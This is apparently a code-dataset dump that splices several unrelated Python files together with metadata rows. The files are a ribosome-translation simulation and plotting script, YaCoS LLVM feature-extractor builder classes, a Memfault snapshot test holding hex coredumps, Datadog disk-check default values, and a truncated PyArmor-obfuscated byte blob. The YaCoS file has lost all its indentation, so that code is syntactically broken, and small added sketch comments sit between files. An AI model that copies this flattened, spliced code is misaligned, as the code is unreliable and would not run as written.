    ssa_translation_generic_lowmem.run_SSA_generic(result, ribtimes, coltimes, kelong, frapresult, t_array, np.array([0, 0, 0], dtype=np.float64), seeds[i], nribs, k_add.flatten(), 2, 0, 2, 0)
    all_results[i, :] = result
    all_frapresults[i, :] = frapresult
    all_coltimes[i, :] = coltimes
    all_ribtimes[i, :] = ribtimes
    all_ribs[i, :] = nribs[0]
traj = all_results[0,:].reshape((N_rib,len(t_array))).T
f,ax = plt.subplots(2,1)
ax[0].set_ylim([0,300])
ax[0].fill_between([0,400],[100,100],color='red',alpha=.2)
ax[0].fill_between([0,400],[200,200],color='green',alpha=.2)
ax[0].fill_between([0,400],[300,300],color='blue',alpha=.2)
ax[0].plot(traj,'.')
ax[0].set_xlabel('Time')
ax[0].set_ylabel('Ribosome Location')
ax[0].set_title(' 100 codons, enters: 0,10 2,20 stops: 0,50 and 2,80' )
spatial_x = (traj + (traj > 100) + (traj > 199))%100
ax[1].set_ylim([0,100])
#ax[1].plot(t_array,spatial_x,'.')
ax[1].plot(t_array_copy.T[traj<=100],spatial_x[traj <= 100],'r.')
ax[1].plot(t_array_copy.T[traj>100],spatial_x[traj > 100],'g.')
ax[1].plot(t_array_copy.T[traj>199],spatial_x[traj > 199],'b.')
ax[1].set_xlabel('Time')
ax[1].set_ylabel('Ribosome Location')
ax[1].set_title(' spatial location ' )
ax[1].legend(['0','+1','+2'])
###########
k = np.ones((1,300)).flatten()
kelong = k[1:-1]
kelong[49] = 0
kelong[39] = 0.1
kelong[278] = 0
k_enters = np.array([[10,0,.04],[10,2,.02]],dtype=np.float64)
k_stops = np.array([[50,0,10],[80,2,10]],dtype=np.float64)
k_fss = []
k_pause = np.array([[40,0,100]],dtype=np.float64)
#k_pause = np.array([[30,2,100],[40,2,100]],dtype=np.float64)
k_enters,k_pauses,k_stops,k_jumps,frames_used = generate_additional_ks(k_enters,k_pause,k_fss,k_stops,100)
t_array = np.array([0,100,500],dtype=np.float64)
t0 = 15
t_array = np.linspace(0,400,400,dtype=np.float64)
N_rib = 200
result = np.zeros((len(t_array)*N_rib),dtype=np.int32 )
#kelong = np.array([3.1,3.2,3.3,3.4,3.5,3.1,3.2,3.3,3.4,3.5],dtype=np.float64)
n_trajectories = 1
start = time.time()
all_results = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
lenfrap = len(np.intersect1d(np.where(t_array>0)[0],np.where(t_array<20)[0]))
all_frapresults = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
all_ribtimes = np.zeros((n_trajectories,400),dtype=np.float64)
all_coltimes = np.zeros((n_trajectories,400),dtype=np.int32)
nribs = np.array([0],dtype=np.int32)
all_ribs = np.zeros((n_trajectories,1))
seeds = np.random.randint(0,0x7FFFFFF,n_trajectories)
k_add = np.hstack((k_enters.flatten(),k_pauses.flatten(),k_stops.flatten(),k_jumps.flatten() ))
t_array_copy = np.copy(t_array)
while t_array_copy.shape[0] != 200:
    t_array_copy = np.vstack((t_array_copy, t_array))
for i in range(n_trajectories):
    result = np.zeros((len(t_array)*N_rib), dtype=np.int32)
    frapresult = np.zeros((len(t_array)*N_rib), dtype=np.int32)
    ribtimes = np.zeros((400), dtype=np.float64)
    coltimes = np.zeros((400), dtype=np.int32)
    ssa_translation_generic_lowmem.run_SSA_generic(result, ribtimes, coltimes, kelong, frapresult, t_array, np.array([0, 0, 0], dtype=np.float64), seeds[i], nribs, k_add.flatten(), len(k_enters), len(k_pauses), len(k_stops), len(k_jumps))
    all_results[i, :] = result
    all_frapresults[i, :] = frapresult
    all_coltimes[i, :] = coltimes
    all_ribtimes[i, :] = ribtimes
    all_ribs[i, :] = nribs[0]
traj = all_results[0,:].reshape((N_rib,len(t_array))).T
f,ax = plt.subplots(2,1)
ax[0].set_ylim([0,300])
ax[0].fill_between([0,400],[100,100],color='red',alpha=.2)
ax[0].fill_between([0,400],[200,200],color='green',alpha=.2)
ax[0].fill_between([0,400],[300,300],color='blue',alpha=.2)
ax[0].plot(traj,'.')
ax[0].set_xlabel('Time')
ax[0].set_ylabel('Ribosome Location')
ax[0].set_title('100 codons, enters: 0,10 2,20 stops: 0,50 and 2,80')
spatial_x = (traj + (traj > 100) + (traj > 199))%100
ax[1].set_ylim([0,100])
#ax[1].plot(t_array,spatial_x,'.')
ax[1].plot(t_array_copy.T[traj<=100],spatial_x[traj <= 100],'r.')
ax[1].plot(t_array_copy.T[traj>100],spatial_x[traj > 100],'g.')
ax[1].plot(t_array_copy.T[traj>199],spatial_x[traj > 199],'b.')
ax[1].set_xlabel('Time')
ax[1].set_ylabel('Ribosome Location')
ax[1].set_title('Spatial location')
ax[1].legend(['0','+1','+2'])
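# Sketch (not in the original script): the expression used for spatial_x above folds
# the concatenated reading-frame positions back onto one 0-99 spatial axis; as in the
# plotting masks, positions <=100 are frame 0, >100 frame +1, >199 frame +2. Works
# element-wise on scalars or numpy arrays.
def _to_spatial(p):
    return (p + (p > 100) + (p > 199)) % 100
# e.g. _to_spatial(50) -> 50, _to_spatial(150) -> 51, _to_spatial(250) -> 52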
8fd05ccbe3ba85cc4233cfa03a02a7f24edced6f | 7,976 | py | Python | yacos/info/compy/llvm_vec.py | ComputerSystemsLaboratory/YaCoS | abd5d3c6e227e5c7a563493f7855ebf58ba3de05 | [
"Apache-2.0"
] | 8 | 2022-02-03T16:41:01.000Z | 2022-02-09T11:29:20.000Z | yacos/info/compy/llvm_vec.py | ComputerSystemsLaboratory/YaCoS | abd5d3c6e227e5c7a563493f7855ebf58ba3de05 | [
"Apache-2.0"
] | null | null | null | yacos/info/compy/llvm_vec.py | ComputerSystemsLaboratory/YaCoS | abd5d3c6e227e5c7a563493f7855ebf58ba3de05 | [
"Apache-2.0"
] | null | null | null | """
Copyright 2021 Anderson Faustino da Silva.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
from absl import logging as lg
from yacos.info.compy.extractors.extractors import ClangDriver
from yacos.info.compy.extractors.extractors import LLVMDriver
from yacos.info.compy.extractors.extractors import LLVMIRExtractor
class LLVMHistogramBuilder():
"""Milepost Static Features."""
def __init__(self, driver=None):
"""Initialize the representation."""
if driver:
self.__driver = driver
else:
self.__driver = ClangDriver(
ClangDriver.ProgrammingLanguage.C,
ClangDriver.OptimizationLevel.O3,
[],
["-Wall"],
)
self.__extractor = LLVMIRExtractor(self.__driver)
def source_to_info(self, filename, additional_include_dir=None):
"""Extract the representation from source code."""
if not isinstance(self.__driver, ClangDriver):
lg.error('source_to_info needs ClangDriver')
sys.exit(1)
if additional_include_dir:
self.__driver.addIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
info = self.__extractor.HistogramFromSource(filename)
if additional_include_dir:
self.__driver.removeIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
return info
def ir_to_info(self, filename):
"""Extract representation from IR."""
if not isinstance(self.__driver, LLVMDriver):
lg.error('ir_to_info needs LLVMDriver')
sys.exit(1)
info = self.__extractor.HistogramFromIR(filename)
return info
class LLVMOpcodesBuilder():
"""Milepost Static Features."""
def __init__(self, driver=None):
"""Initialize the representation."""
if driver:
self.__driver = driver
else:
self.__driver = ClangDriver(
ClangDriver.ProgrammingLanguage.C,
ClangDriver.OptimizationLevel.O3,
[],
["-Wall"],
)
self.__extractor = LLVMIRExtractor(self.__driver)
def source_to_info(self, filename, additional_include_dir=None):
"""Extract the representation from source code."""
if not isinstance(self.__driver, ClangDriver):
lg.error('source_to_info needs ClangDriver')
sys.exit(1)
if additional_include_dir:
self.__driver.addIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
info = self.__extractor.OpcodesFromSource(filename)
if additional_include_dir:
self.__driver.removeIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
return info
def ir_to_info(self, filename):
"""Extract representation from IR."""
if not isinstance(self.__driver, LLVMDriver):
lg.error('ir_to_info needs LLVMDriver')
sys.exit(1)
info = self.__extractor.OpcodesFromIR(filename)
return info
class LLVMMSFBuilder():
"""Milepost Static Features."""
def __init__(self, driver=None):
"""Initialize the representation."""
if driver:
self.__driver = driver
else:
self.__driver = ClangDriver(
ClangDriver.ProgrammingLanguage.C,
ClangDriver.OptimizationLevel.O3,
[],
["-Wall"],
)
self.__extractor = LLVMIRExtractor(self.__driver)
def source_to_info(self, filename, additional_include_dir=None):
"""Extract the representation from source code."""
if not isinstance(self.__driver, ClangDriver):
lg.error('source_to_info needs ClangDriver')
sys.exit(1)
if additional_include_dir:
self.__driver.addIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
info = self.__extractor.MSFFromSource(filename)
if additional_include_dir:
self.__driver.removeIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
return info
def ir_to_info(self, filename):
"""Extract representation from IR."""
if not isinstance(self.__driver, LLVMDriver):
lg.error('ir_to_info needs LLVMDriver')
sys.exit(1)
info = self.__extractor.MSFFromIR(filename)
return info
class LLVMLoopBuilder():
"""Loop Features."""
def __init__(self, driver=None):
"""Initialize the representation."""
if driver:
self.__driver = driver
else:
self.__driver = ClangDriver(
ClangDriver.ProgrammingLanguage.C,
ClangDriver.OptimizationLevel.O3,
[],
["-Wall"],
)
self.__extractor = LLVMIRExtractor(self.__driver)
def source_to_info(self, filename, additional_include_dir=None):
"""Extract the representation from source code."""
if not isinstance(self.__driver, ClangDriver):
lg.error('source_to_info needs ClangDriver')
sys.exit(1)
if additional_include_dir:
self.__driver.addIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
info = self.__extractor.LoopFromSource(filename)
if additional_include_dir:
self.__driver.removeIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
return info
def ir_to_info(self, filename):
"""Extract representation from IR."""
if not isinstance(self.__driver, LLVMDriver):
lg.error('ir_to_info needs LLVMDriver')
sys.exit(1)
info = self.__extractor.LoopFromIR(filename)
return info
class LLVMIR2VecBuilder():
"""Globals and Functions names."""
def __init__(self, driver=None):
"""Initialize the representation."""
if driver:
self.__driver = driver
else:
self.__driver = ClangDriver(
ClangDriver.ProgrammingLanguage.C,
ClangDriver.OptimizationLevel.O3,
[],
["-Wall"],
)
self.__extractor = LLVMIRExtractor(self.__driver)
def source_to_info(self, filename, additional_include_dir=None):
"""Extract info from the source code."""
if not isinstance(self.__driver, ClangDriver):
lg.error('source_to_info needs ClangDriver')
sys.exit(1)
if additional_include_dir:
self.__driver.addIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
info = self.__extractor.IR2VecFromSource(filename)
if additional_include_dir:
self.__driver.removeIncludeDir(
additional_include_dir, ClangDriver.IncludeDirType.User
)
return info
def ir_to_info(self, filename):
"""Extract info from the IR."""
if not isinstance(self.__driver, LLVMDriver):
lg.error('ir_to_info needs LLVMDriver')
sys.exit(1)
info = self.__extractor.IR2VecFromIR(filename)
return info
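# Sketch (illustration only, not part of YaCoS): every builder above follows the same
# driver-dispatch contract -- source_to_info requires a ClangDriver, ir_to_info an
# LLVMDriver. The stand-in names _ClangDriver/_LLVMDriver below are hypothetical, and
# the real classes call sys.exit(1) instead of raising.
class _ClangDriver:
    pass

class _LLVMDriver:
    pass

def _ir_to_info(driver, filename):
    if not isinstance(driver, _LLVMDriver):
        raise TypeError('ir_to_info needs LLVMDriver')
    return {'filename': filename}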
8f324661f13d17bbb102d193e8e253f54de66e7a | 2,939 | py | Python | scripts/tests/snapshots/snap_test_memfault_gdb.py | ExploramedNC7/memfault-firmware-sdk | 4c418795e5de9f97b87e5966751dc35027238d65 | [
"BSD-3-Clause"
] | null | null | null | scripts/tests/snapshots/snap_test_memfault_gdb.py | ExploramedNC7/memfault-firmware-sdk | 4c418795e5de9f97b87e5966751dc35027238d65 | [
"BSD-3-Clause"
] | null | null | null | scripts/tests/snapshots/snap_test_memfault_gdb.py | ExploramedNC7/memfault-firmware-sdk | 4c418795e5de9f97b87e5966751dc35027238d65 | [
"BSD-3-Clause"
] | null | null | null | #
# Copyright (c) 2019-Present Memfault, Inc.
# See License.txt for details
#
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots[
"test_coredump_writer 1"
] = "434f52450100000002010000000000000000000054000000000000000101010102020202030303030404040405050505060606060707070708080808090909090a0a0a0a0b0b0b0b0c0c0c0c0d0d0d0d0e0e0e0e0f0f0f0f101010101111111112121212131313131414141402000000000000000d0000006465766963655f73657269616c0a0000000000000005000000312e302e300b00000000000000040000006d61696e0400000000000000090000006764622d70726f746f070000000000000004000000280000000500000000000000040000000500000001000000fcffffff04000000a288485d01000000040000000b00000068656c6c6f20776f726c64"
snapshots[
"test_coredump_command_with_login_no_existing_release_or_symbols[None--fixture2.bin] 1"
] = "434f524501000000a101100000000000000000005400000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000001000000044454d4f53455249414c4e554d4245520a0000000000000012000000312e302e302d6d64352b62363162326436630b00000000000000040000006d61696e040000000000000008000000444556424f415244070000000000000004000000280000000500000000000000040000000500000001000000fcffffff04000000a288485d0100000000ed00e08f00000041414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141410100000000000020000010004141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141"
snapshots[
"test_coredump_command_with_login_no_existing_release_or_symbols[None--r 0x600000 8 -r 0x800000 4-fixture3.bin] 1"
] = "434f524501000000b901000000000000000000005400000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000001000000044454d4f53455249414c4e554d4245520a0000000000000012000000312e302e302d6d64352b62363162326436630b00000000000000040000006d61696e040000000000000008000000444556424f415244070000000000000004000000280000000500000000000000040000000500000001000000fcffffff04000000a288485d0100000000ed00e08f0000004141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141010000000000600008000000414141414141414101000000000080000400000041414141"
| 122.458333 | 1,006 | 0.953386 | 75 | 2,939 | 37.026667 | 0.666667 | 0.014044 | 0.022686 | 0.020166 | 0.048254 | 0.048254 | 0.048254 | 0.048254 | 0.048254 | 0.048254 | 0 | 0.806632 | 0.025179 | 2,939 | 23 | 1,007 | 127.782609 | 0.162653 | 0.044913 | 0 | 0.25 | 0 | 0 | 0.934643 | 0.911429 | 0 | 1 | 0.005714 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8f46ae88b28dd50d7ecf53842c2c28f57da3f24c | 2,701 | py | Python | disk/datadog_checks/disk/config_models/defaults.py | kjmadscience/integrations-core | 663bdf44730dd6c9f3565c121318b320bfcb4988 | [
"BSD-3-Clause"
] | null | null | null | disk/datadog_checks/disk/config_models/defaults.py | kjmadscience/integrations-core | 663bdf44730dd6c9f3565c121318b320bfcb4988 | [
"BSD-3-Clause"
] | null | null | null | disk/datadog_checks/disk/config_models/defaults.py | kjmadscience/integrations-core | 663bdf44730dd6c9f3565c121318b320bfcb4988 | [
"BSD-3-Clause"
] | null | null | null | # (C) Datadog, Inc. 2021-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
# This file is autogenerated.
# To change this file you should edit assets/configuration/spec.yaml and then run the following commands:
# ddev -x validate config -s <INTEGRATION_NAME>
# ddev -x validate models -s <INTEGRATION_NAME>
from datadog_checks.base.utils.models.fields import get_default_field_value
def shared_device_global_exclude(field, value):
return get_default_field_value(field, value)
def shared_file_system_global_exclude(field, value):
return get_default_field_value(field, value)
def shared_mount_point_global_exclude(field, value):
return get_default_field_value(field, value)
def shared_service(field, value):
return get_default_field_value(field, value)
def instance_all_partitions(field, value):
return False
def instance_blkid_cache_file(field, value):
return get_default_field_value(field, value)
def instance_create_mounts(field, value):
return get_default_field_value(field, value)
def instance_device_exclude(field, value):
return get_default_field_value(field, value)
def instance_device_include(field, value):
return get_default_field_value(field, value)
def instance_device_tag_re(field, value):
return get_default_field_value(field, value)
def instance_disable_generic_tags(field, value):
return False
def instance_empty_default_hostname(field, value):
return False
def instance_file_system_exclude(field, value):
return get_default_field_value(field, value)
def instance_file_system_include(field, value):
return get_default_field_value(field, value)
def instance_include_all_devices(field, value):
return True
def instance_metric_patterns(field, value):
return get_default_field_value(field, value)
def instance_min_collection_interval(field, value):
return 15
def instance_min_disk_size(field, value):
return 0
def instance_mount_point_exclude(field, value):
return get_default_field_value(field, value)
def instance_mount_point_include(field, value):
return get_default_field_value(field, value)
def instance_service(field, value):
return get_default_field_value(field, value)
def instance_service_check_rw(field, value):
return False
def instance_tag_by_filesystem(field, value):
return False
def instance_tag_by_label(field, value):
return True
def instance_tags(field, value):
return get_default_field_value(field, value)
def instance_timeout(field, value):
return 5
def instance_use_lsblk(field, value):
return False
def instance_use_mount(field, value):
return False
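# Sketch (illustration only, not generated code): the functions above are consulted
# by the config models when a field is unset -- scalar defaults are returned directly,
# while get_default_field_value derives one from the field definition. A minimal
# stand-in for the lookup (names _EXAMPLE_DEFAULTS/_resolve are hypothetical):
_EXAMPLE_DEFAULTS = {
    'timeout': instance_timeout,
    'use_mount': instance_use_mount,
}

def _resolve(name, value=None):
    # Return the user-supplied value, else the generated default.
    if value is not None:
        return value
    return _EXAMPLE_DEFAULTS[name](None, None)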
8f4a9e1efd52f671e235cede6cca635e2be72fa2 | 14,035 | py | Python | src/entitlements/django.py | MoveBigRocks/entitlements | 30a512ff6be0a4089d3edae985d5deadb3006d0d | [
"MIT"
] | null | null | null | src/entitlements/django.py | MoveBigRocks/entitlements | 30a512ff6be0a4089d3edae985d5deadb3006d0d | [
"MIT"
] | null | null | null | src/entitlements/django.py | MoveBigRocks/entitlements | 30a512ff6be0a4089d3edae985d5deadb3006d0d | [
"MIT"
] | null | null | null | __pyarmor__(__name__, __file__, b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x09\x00\x61\x0d\x0d\x0a\x08\x2d\xa0\x01\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x6b\x0d\x00\x00\x00\x00\x00\x10\xcc\xe4\x3f\xa3\xae\x34\x44\x4c\x70\xa3\x47\x46\x50\x32\xbe\x8a\x00\x00\x00\x00\x00\x00\x00\x00\x76\xeb\x10\xb0\xb2\xff\xf6\x04\xff\xa5\x0c\x2c\x23\xa4\xd2\x45\xde\xd2\xc0\x0a\x6d\x6b\xc7\xec\xea\xc2\x1c\xb8\xf9\x49\xb0\x7e\x77\xad\x60\x6e\x38\x91\x7a\xad\x34\x27\xd7\xd0\x7b\x94\xba\xfc\xf7\xe8\x4d\x45\x6a\x87\xca\x28\x3a\x59\xb9\x3f\xa9\xed\xa0\x9b\xc0\x08\x67\x62\xa1\x05\x99\x09\x89\x0e\x17\xaf\xc6\xaa\xcd\xca\xcc\x79\x72\xfb\xed\x64\x9f\xf9\x9d\xe5\x40\xf2\xdd\x49\x3c\x00\xab\x5c\x63\xa0\xdf\x6f\xee\xa2\x7f\x2c\xd6\x08\xa1\x69\x1d\x9d\x04\x6e\xc0\x09\x7c\xc5\x45\x4b\xa3\x28\x97\xd2\x29\x6c\x7a\x28\x42\x92\x0f\x4b\x42\x01\xea\xe5\x39\x75\x02\xc7\x52\xac\x97\x3d\x94\x42\x96\x67\x52\xfe\x98\x86\xdb\xa1\xe5\x56\xd9\xe5\x32\x8c\x54\xc3\x4b\xed\x5d\xbf\x93\x8c\xef\x30\xad\xee\x0f\x56\xa1\xbb\x44\xe9\x89\xbc\xbf\x56\xbe\xda\xa4\xcc\x04\x63\x5f\xea\x1f\xfe\xa0\x92\xb4\x48\x79\x30\x9e\xf7\xd0\x01\x9b\x39\xf3\x60\xf6\xe0\xa4\x79\xdc\xb2\x17\x67\x99\x17\x24\x46\x1f\xf4\xb2\x4f\xa3\x38\xad\x0e\x03\xf0\xa0\x24\xad\x75\x54\x9c\xe8\x54\x93\xfc\x76\xf3\x3d\x66\x88\xa2\xd0\xec\xed\xf5\x2c\x99\x9f\xe4\xec\x43\x0a\xeb\xdc\x28\x65\xe4\xf1\xb0\xf0\x05\x42\x75\x80\x8a\x19\x31\x59\x0a\x4a\x9e\x9b\xa5\xf4\x81\x27\xa9\xbe\x1b\x38\x24\x88\x71\x06\x2f\xf2\x3c\xa8\xb0\xcb\x04\x40\x71\xe9\x27\x9e\xaf\xba\xde\x47\xc2\x52\x3d\x53\xcd\x52\x8e\xd8\xc8\xf4\xa8\x1b\x11\x16\x0d\x58\x01\x79\xe1\xc2\x1b\xe4\x1f\xed\x8c\xdf\x43\x50\x84\x2d\x46\x8a\xd5\x7c\x0c\x2c\xa0\xdd\xb9\xb0\xf1\x05\xa6\x69\xcf\xa1\xab\xd8\x7b\x08\x98\xf2\xba\xf1\x0f\x2a\xb2\xea\xc9\x90\x1e\xd5\x4b\xfb\xab\x16\xe2\xdc\x50\x26\x43\x50\x6b\x7c\x8a\xb7\xba\x37\x3e\x3f\x71\x68\xcf\x17\xb9\x22\x5d\x0d\x00\xad\x4b\xcb\x6b\x87\xbb\x58\x04\xcd\xd6\x06\x5e\x02\x22\xe2\xbd\xe5\x72\xab\xc7\x40\x75\xd4\x6a\xdb\x64\xf4\x2a\x78\
xc8\x9e\x08\x65\x38\x4a\x95\xd8\x87\x50\xa3\x6d\xf1\xdb\xb9\x85\xac\xff\xf2\x8e\x98\x50\x68\x8d\xa2\x4e\xb3\x5c\xcd\x52\xdf\x6b\xb0\x33\x19\xc5\x09\x42\xec\xc2\x02\xd8\x7a\x7b\x55\xc0\x51\xcd\x42\x7c\x90\x20\x56\x58\x5d\xde\x53\x20\xe7\xfd\x0c\xb6\xda\x36\xda\xc4\x3e\xd0\x77\x3a\x09\xa1\x84\x87\xe9\xd7\x4b\x5d\x4e\x5f\xb9\x33\x51\x6f\x2a\xfd\xa0\x70\x86\xc4\x4a\xb7\xc0\xd3\x24\x6c\xe8\xa3\x5b\x99\x36\x73\xc7\x28\x4d\x9d\x70\x77\xe4\xe6\x3d\x5d\xc4\x28\x71\x76\x20\xe0\xfc\x08\x29\xb7\xb1\xeb\x8a\x88\x81\x20\x4b\x31\xe2\xb6\xf6\x48\x66\x7a\x77\x63\xba\x48\x10\x50\xf0\xd8\x9b\x80\x57\x38\x10\xd6\x86\x4c\x3b\x5e\xa8\xd2\x09\x0b\xec\x27\x0d\x58\x54\xe1\x34\x80\xfb\x3a\x16\xfa\x5b\x23\x58\x6f\x44\x78\x32\x1a\xcf\xa9\x0e\x69\x13\x48\x5e\xbc\xd2\x87\x86\x5e\xe0\xf0\x10\x33\x01\x79\xc8\x7e\x3d\x92\x63\xd1\x91\x0a\xae\xd6\x74\x0a\xa6\x3a\x21\xad\xfc\xf4\xd9\xc1\x4d\xa9\x74\x45\xc0\x75\x49\x25\xf3\x30\x43\xb2\x31\x74\xe6\x48\x48\xe4\xf4\xc0\xf0\x1d\x4d\x1e\x3f\xb0\x68\x56\x01\x72\xf4\x4b\xe9\xd5\x25\xbb\x46\xaf\x33\xac\x40\x7a\x29\xbf\x5c\xec\x90\xd4\x5d\xe5\x2e\xce\x6c\xe5\x86\xb5\xb2\xe2\x4d\x56\x72\x97\x6e\xef\x5f\x2e\x18\xb4\x0e\xec\xb5\x27\xaa\x54\xf2\x98\x5b\xa0\xac\xef\x11\x48\x0b\xa8\xab\x78\x91\x3c\x57\xff\x23\xd0\xc7\xdf\x64\x22\x39\xc5\x02\xac\xee\x4f\x57\xae\xf8\xc1\xf0\x9b\x54\xdf\xd3\x38\x10\x95\x00\x55\x32\x6e\x6b\x69\xa4\xd1\x4c\x56\x68\xc0\x54\x5d\x3a\x55\x47\xf4\x1b\x89\xb7\x40\x14\xf0\xeb\x1b\x55\xd0\x95\x3e\x76\x90\xdd\x81\x3c\x71\xa8\xa5\xce\x3f\x54\xbb\xe8\xbd\x85\xc3\xc9\x20\xeb\xde\xd1\xcb\x4e\xb0\xd5\x22\xcd\xe4\xeb\xc5\x3b\x5d\xb0\x9a\xcd\xfa\xc8\xab\x43\x89\xb5\x69\x84\x4b\x95\xd3\x62\xa3\x06\xdb\xf6\xbf\xf0\x59\xc5\x04\x44\x59\xb3\xfc\x70\x94\xe4\x74\xaa\x2f\xb6\x1f\x28\xd9\x66\x9a\xde\x93\xec\x43\x26\x58\xb4\xdc\xc2\xdc\xa9\xbe\xd8\x47\xf7\x49\xe8\x84\xe1\x42\xac\xf0\x2b\xaf\x2f\xf1\x54\x8a\x0f\x79\x18\xd5\xa5\x09\x84\x57\x26\x11\xac\x2c\x2e\x06\xbf\xb2\x92\x78\xe0\x50\xa6\xfd\xe6\x6e\x77\x07\x8e\x45\x55\x05\x4d\xc7\xcf\x74\x5c\x90\x7f\x41\xd5\xa1\
x39\xb5\xc1\xee\x90\xcb\x77\x17\xf6\xc9\xf6\x2f\x3f\xbb\x84\x36\xd6\xd1\xb5\x12\x2d\x8c\xa8\xe1\x5b\x5a\x05\x84\xb2\xb4\xcc\x58\x15\xd2\xb5\x61\x90\xb6\xb9\x6b\x00\xbb\x95\x6a\x47\x31\x10\xb5\x8e\xb3\x0f\x29\x76\x7e\x60\x3d\xa0\xd7\x25\xca\xa3\xa3\xab\x20\x3d\x5d\xfa\x6a\xe3\x52\x1b\x54\x14\x5b\x81\xc7\xd3\xef\xa9\x61\x16\x88\x26\x11\x62\xec\x9b\x30\xd1\xe9\x4c\x57\x4a\x10\xf3\x3d\x93\xfe\xc6\x14\x7c\x6f\x34\x88\xd0\x30\xbb\x53\x72\x5a\x7b\x4a\xe5\xb4\x57\x75\xa5\x8d\xce\x25\xf4\x15\xaa\x40\x2e\x9b\x16\x41\x7f\xd8\x5a\x3d\x0e\xd7\x9d\x92\x80\x4a\x36\xed\x3a\xb0\xc6\xb0\xb7\xfe\x1d\x40\xc2\x24\x73\x9b\xd1\x12\xcb\xa8\xfd\xd1\x16\xf9\xb2\x25\x8b\xbb\x30\xa9\x2c\x71\x16\xb5\x3e\x0d\x5c\x59\x6c\x01\x9e\x25\x10\x06\x4f\x6f\x1e\xa3\x18\x07\x28\xa6\x79\xaf\x22\xf9\x96\x80\x8e\x62\xa3\xbe\x4d\xf0\x07\xb2\xd8\xb5\x07\x23\x52\x13\x69\x49\x21\xf6\x75\xc6\x23\xda\xb9\x89\x10\x47\x24\x0b\x9b\x0a\x9a\xae\x67\xa9\x0f\xa4\x6a\x31\x4d\x6e\xb1\xcb\x15\x44\xdb\x3e\x77\x78\x85\x2f\x97\x8d\x2e\x7f\xf5\x15\x24\x54\xf3\xb3\xb1\x1d\xc0\xd7\x8b\x4b\x09\x5e\x0e\xca\x75\x47\x6a\xa3\x04\xe9\x38\x6f\x55\x2a\xd0\xfd\xf2\x91\xa1\xa6\xcd\x2f\x02\x14\x8a\xa7\xd6\x51\x5a\xd2\xb2\x63\xa9\x79\x8b\x8e\xa4\x59\x09\x9b\xd2\x2d\xb1\x88\xb3\xbf\x3f\x1c\x51\x86\x66\x18\x14\xf1\x30\xdf\xd2\xaa\x12\x34\x6a\xb1\x64\xb4\xa8\x59\x9f\x2d\x05\xb0\x59\xb0\xeb\x1b\x29\xfa\xdc\xbd\x1f\x02\x5a\xc2\x94\xaf\x0a\x53\xd0\x15\x65\xc0\xf0\x4a\xc7\x0d\x73\x1f\x64\x02\x53\x2c\x17\x66\x63\x45\xb5\x35\x25\x5d\x9b\xd1\x84\xbc\xd4\xeb\xeb\x63\x4a\x45\x49\x52\x75\x67\xd6\x32\x0e\xdf\x2a\x08\xc0\xfa\x8a\xb2\xca\xf9\xdb\xca\xc6\x17\x14\xdc\x07\x5d\x6d\x8a\xd9\xa5\x46\x3e\x81\x8e\xe9\x6f\xbc\xa1\xe9\xf7\x64\x45\x7b\xce\x9e\xa2\x5d\x1a\xc2\x3d\x6f\x59\x29\x3a\xcb\x7d\xef\x79\xa9\x95\x4d\xbb\xfe\x30\xb2\xd0\xf5\x5e\x1d\x7a\x18\xb9\x2f\x24\x0a\xf2\xa6\x59\xb2\x7c\xd4\x30\x4c\xb8\xd7\xda\x8c\x7a\x6f\x68\x11\x93\xbc\x19\x17\x3e\x9f\x82\x3b\x5e\x0b\x7a\xfd\x4a\x93\xb9\xef\xed\x1e\xe8\x1a\x05\xee\x20\x3c\x59\x53\x81\x4c\xea\x29\x85\xd2\xcf\
